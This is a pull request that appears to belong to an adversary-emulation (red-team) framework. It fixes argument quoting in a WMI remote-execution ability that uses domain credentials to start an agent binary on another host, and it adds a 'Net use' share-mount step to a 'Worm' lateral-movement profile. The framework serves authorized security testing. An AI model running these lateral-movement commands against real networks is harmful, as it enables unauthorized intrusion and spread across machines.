### PR TITLE
Fix Worm missing Net Use and Start 54ndc47 quoting

### DIFF
--- a/data/abilities/execution/ece5dde3-d370-4c20-b213-a1f424aa8d03.yml
+++ b/data/abilities/execution/ece5dde3-d370-4c20-b213-a1f424aa8d03.yml
@@ -11,14 +11,26 @@
     windows:
       psh:
         command: |
-          wmic /node:`"#{remote.host.fqdn}`" /user:`"#{domain.user.name}`" /password:`"#{domain.user.password}`" process call create "powershell.exe C:\Users\Public\s4ndc4t.exe -server #{server} -group #{group}";
+          $node = '''#{remote.host.fqdn}''';
+          $user = '''#{domain.user.name}''';
+          $password = '''#{domain.user.password}''';
+          wmic /node:$node /user:$user /password:$password process call create "powershell.exe C:\Users\Public\s4ndc4t.exe -server #{server} -group #{group}";
         cleanup: |
-          wmic /node:`"#{remote.host.fqdn}`" /user:`"#{domain.user.name}`" /password:`"#{domain.user.password}`" process call create "taskkill /f /im s4ndc4t.exe"
+          $node = '''#{remote.host.fqdn}''';
+          $user = '''#{domain.user.name}''';
+          $password = '''#{domain.user.password}''';
+          wmic /node:$node /user:$user /password:$password process call create "taskkill /f /im s4ndc4t.exe"
       cmd:
         command: |
-          wmic /node:`"#{remote.host.fqdn}`" /user:`"#{domain.user.name}`" /password:`"#{domain.user.password}`" process call create "cmd.exe C:\Users\Public\s4ndc4t.exe -server #{server} -group #{group}";
+          $node = '''#{remote.host.fqdn}''';
+          $user = '''#{domain.user.name}''';
+          $password = '''#{domain.user.password}''';
+          wmic /node:$node /user:$user /password:$password process call create "cmd.exe C:\Users\Public\s4ndc4t.exe -server #{server} -group #{group}";
         cleanup: |
-          wmic /node:`"#{remote.host.fqdn}`" /user:`"#{domain.user.name}`" /password:`"#{domain.user.password}`" process call create "taskkill /f /im s4ndc4t.exe"
+          $node = '''#{remote.host.fqdn}''';
+          $user = '''#{domain.user.name}''';
+          $password = '''#{domain.user.password}''';
+          wmic /node:$node /user:$user /password:$password process call create "taskkill /f /im s4ndc4t.exe"
   singleton: True
   requirements:
     - plugins.stockpile.app.requirements.basic:

--- a/data/adversaries/78e7504d-968f-477d-8806-4d6c04b94431.yml
+++ b/data/adversaries/78e7504d-968f-477d-8806-4d6c04b94431.yml
@@ -14,6 +14,7 @@ atomic_ordering:
   - fdf8bf36-797f-4157-805b-fe7c1c6fc903  # nbtstat hostname lookup
   - fa4ed735-7006-4451-a578-b516f80e559f # nslookup names
 # Copy remotely
+  - aa6ec4dd-db09-4925-b9b9-43adeb154686 # Net use
   - 65048ec1-f7ca-49d3-9410-10813e472b30 # SMB copy
   - 4908fdc4-74fc-4d7c-8935-26d11ad26a8d # WinRM and SCP
 # Remote exec


### PR DESCRIPTION
## Description

The Worm adversary profile attempts to copy a file to an admin share without mounting the share. This PR adds the Net Use ability to Worm to mount an admin share.

Start 54ndc47 (WMI) fails if the node argument contains hyphens or the password arguments contain special characters. This PR makes these arguments into variables with triple-quoting.

## Type of change

Please delete options that are not relevant.

- [x] Bug fix (non-breaking change which fixes an issue)
- [ ] New feature (non-breaking change which adds functionality)
- [ ] Breaking change (fix or feature that would cause existing functionality to not work as expected)
- [ ] This change requires a documentation update

## How Has This Been Tested?

I tested this change on a Window VM and no longer get errors when the node argument contains hyphens or the password argument contain special characters.

## Checklist:

- [x] My code follows the style guidelines of this project
- [x] I have performed a self-review of my own code
- [ ] I have made corresponding changes to the documentation
- [ ] I have added tests that prove my fix is effective or that my feature works
